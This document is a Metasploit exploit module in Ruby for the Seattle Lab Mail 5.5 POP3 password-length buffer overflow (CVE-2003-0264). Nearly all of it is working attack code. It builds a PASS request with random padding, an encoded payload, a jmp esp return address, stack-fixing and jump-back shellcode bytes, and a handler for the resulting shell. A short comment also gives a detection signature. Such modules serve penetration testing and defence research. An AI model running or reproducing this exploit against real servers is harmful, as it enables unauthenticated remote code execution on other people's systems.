Path: blob/master/modules/exploits/windows/pop3/seattlelab_pass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Seattle Lab Mail 5.5 POP3 password-length overflow
# (CVE-2003-0264). The module speaks plain TCP POP3: banner, USER, then a
# single PASS command whose argument is padded out to the target 'Offset'.
#
# Detection note (derived from the request built in #exploit): the observable
# on the wire is one PASS command carrying roughly Offset (2606) + 528 bytes
# of argument — a multi-kilobyte PASS line against a server that normally
# receives short credentials — with no further POP3 traffic afterwards.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Provides connect/disconnect, sock, and the RPORT/RHOST options used below.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata with the framework and sets the POP3 port default.
  #
  # @param info [Hash] metadata supplied by the framework; merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
        'Description' => %q{
          There exists an unauthenticated buffer overflow vulnerability
          in the POP3 server of Seattle Lab Mail 5.5 when sending a password
          with excessive length.

          Successful exploitation should not crash either the
          service or the server; however, after initial use the
          port cannot be reused for successive exploitation until
          the service has been restarted. Consider using a command
          execution payload following the bind shell to restart
          the service if you need to reuse the same port.

          The overflow appears to occur in the debugging/error reporting
          section of the slmail.exe executable, and there are multiple
          offsets that will lead to successful exploitation. This exploit
          uses 2606, the offset that creates the smallest overall payload.
          The other offset is 4654.

          The return address is overwritten with a "jmp esp" call from the
          application library SLMFC.DLL found in %SYSTEM%\system32\. This
          return address works against all version of Windows and service packs.

          The last modification date on the library is dated 06/02/99. Assuming
          that the code where the overflow occurs has not changed in some time,
          prior version of SLMail may also be vulnerable with this exploit. The
          author has not been able to acquire older versions of SLMail for
          testing purposes. Please let us know if you were able to get this
          exploit working against other SLMail versions.
        },
        'Author' => 'stinko',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0264'],
          ['OSVDB', '11975'],
          ['BID', '7519'],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          # 'Space' bounds payload.encoded.length, which keeps the padding
          # arithmetic in #exploit (Offset - payload length) non-negative.
          'Space' => 600,
          'BadChars' => "\x00\x0a\x0d\x20",
          'MinNops' => 100,
        },
        'Platform' => 'win',
        'Targets' => [
          ['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ]
        ],
        'DisclosureDate' => '2003-05-07',
        'DefaultTarget' => 0,
        # NOTE(review): the description above states the service keeps running
        # but the port is unusable until a restart; that is a known side effect,
        # yet all three notes are still left as UNKNOWN_* — worth recording.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(110)
      ]
    )
  end

  # Drives the POP3 exchange: reads the banner, sends a throwaway USER, then
  # sends the oversized PASS line and hands off to the payload handler.
  # Returns early (printing an error, sending no payload) when either server
  # reply does not match the expected SLMail greeting text.
  def exploit
    connect

    print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

    # `|| ''` lets a silent server reach the regex check as an empty string
    # rather than nil. `^` anchors at any line start, which is acceptable here
    # because this only classifies a banner; it is not validating input.
    banner = sock.get_once || ''
    if banner !~ /^\+OK POP3 server (.*) ready/
      print_error("POP3 server does not appear to be running")
      return
    end

    sock.put("USER #{rand_text_alphanumeric(10)}\r\n")
    # No `|| ''` on this read: `nil !~ regexp` is true, so an absent reply
    # still takes the rejected-username branch below.
    banner = sock.get_once
    if banner !~ /^\+OK (.*) welcome here/
      print_error("POP3 server rejected username")
      return
    end

    # Random padding plus the encoded payload total exactly target['Offset']
    # bytes; the remaining appended pieces are the fixed byte sequences below.
    request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)
    request << payload.encoded
    request << [target.ret].pack('V') # 'V' = 32-bit little-endian
    request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack
    request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes
    request << rand_text_alphanumeric(512) # cruft
    request << "\r\n"

    sock.put(request)

    # Framework handler waits for the payload's connection; the socket is
    # closed afterwards. The early returns above rely on the framework's
    # normal cleanup for the connection instead of calling disconnect.
    handler
    disconnect
  end
end

